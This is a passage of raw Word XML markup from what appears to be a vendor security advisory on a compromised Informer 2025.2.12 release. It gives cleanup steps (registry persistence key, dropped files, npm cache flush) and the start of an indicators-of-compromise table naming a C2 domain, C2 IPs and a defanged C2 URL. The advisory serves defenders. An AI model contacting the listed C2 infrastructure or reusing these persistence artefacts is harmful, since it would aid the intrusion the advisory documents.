        <w:t>, including but not limited to database connections, domain secrets, API keys, service account credentials, user credentials, SSH keys, keystore keys, sessions, and tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFACE"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Windows-specific</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check for and remove the registry persistence key at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the files </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>%PROGRAMDATA%\system.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%PROGRAMDATA%\wt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFACF"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Flush local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cache clean --force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAD0" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Clean reinstall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: Remove all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>files, download the rebuilt Informer 2025.2.12 artifacts for your deployment, and reinstall. Contact Entrinsik CS for assistance if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAD1" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Monitor your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Datasources</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">for unauthorized access from unfamiliar IP addresses. Legitimate Informer Cloud traffic’s IP address will be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>52.1.147.31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">when coming from the wider Internet and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>172.29.86.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">when coming from our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Wireguard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN. If you are using SSH tunnels, the legitimate traffic will appear as if it is coming from your intermediary machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAD2" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> There is no risk that the vulnerability will have spread through your machines or network just by using Informer Cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAD3" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> See the two </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> articles below for more diagnosis, cleaning, and mitigation steps, terminal commands, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> defender guidance, and additional reading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAD4" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7.2 Client Remediation Guidance: Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFAD5" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Network Indicators</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3125"/>
        <w:gridCol w:w="1089"/>
        <w:gridCol w:w="5146"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAD9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3125"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D6" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="108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D7" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5146"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D8" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFADD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3125"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DA" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>sfrclak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>[.]com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="108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DB" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C2 Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5146"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DC" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolves to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>142.11.206.73</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Registrar: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>NameCheap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, Inc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAE1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3125" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFADE" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>142.11.206[.]73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1089" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFADF" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C2 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5146" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAE0" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Sapphire Sleet C2 IP. Hosted on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Hostwinds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> VPS. Port 8000, HTTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAE5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3125"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E2" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>142.11.206[.]72</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="108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E3" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C2 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5146"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E4" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Alternate C2 IP referenced in Microsoft mitigation guidance. Port 8000.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAE9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3125" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAE6" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>hxxp://sfrclak[.]com:8000/6202033</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1089" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAE7" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C2 URL</w:t>
